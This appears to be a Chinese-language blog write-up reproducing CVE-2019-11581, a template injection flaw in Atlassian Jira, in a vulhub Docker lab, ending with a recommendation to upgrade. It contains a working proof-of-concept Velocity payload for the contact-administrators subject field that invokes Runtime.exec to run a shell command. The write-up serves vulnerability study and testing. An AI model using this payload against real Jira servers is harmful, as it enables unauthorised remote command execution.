Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

admin 2021年4月23日04:05:18评论336 views字数 1038阅读3分27秒阅读模式

漏洞描述


Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。多个版本前存在利用模板注入执行任意命令:


影响范围


4.4.x5.x.x6.x.x7.0.x7.1.x7.2.x7.3.x7.4.x7.5.x7.6.x before 7.6.14 (the fixed version for 7.6.x)7.7.x7.8.x7.9.x7.10.x7.11.x7.12.x7.13.x before 7.13.5 (the fixed version for 7.13.x)8.0.x before 8.0.3 (the fixed version for 8.0.x)8.1.x before 8.1.2 (the fixed version for 8.1.x)8.2.x before 8.2.3 (the fixed version for 8.2.x)

 

 

环境搭建

 

这里使用docker进行安装

 

进入目录

cd vulhub/jira/CVE-2019-11581/

启动环境

docker-compose up -d


Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

访问

http://your-ip:8080


选择将其设置为我

Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

Atlassian官方申请一个Jira Server的测试证书

Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

 

漏洞复现

 

登录成功后访问,添加

http://192.168.204.131:8080/secure/admin/AddSmtpMailServer!default.jspa



Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

访问,进行系统设置

http://192.168.204.131:8080/secure/admin/EditApplicationProperties!default.jspa


开启联系管理员表单


Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

然后随便创建一个项目

创建成功后,访问

http://192.168.204.131:8080/secure/ContactAdministrators!default.jspa


 

漏洞爆发点在主题字段,把主题换上我们的payload,点击发送

Poc

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('touch /tmp/cve-2020-11581').toString()


Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

 

修复建议

 

升级到安全版本


本文始发于微信公众号(锋刃科技):Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月23日04:05:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现http://cn-sec.com/archives/202438.html

发表评论

匿名网友 填写信息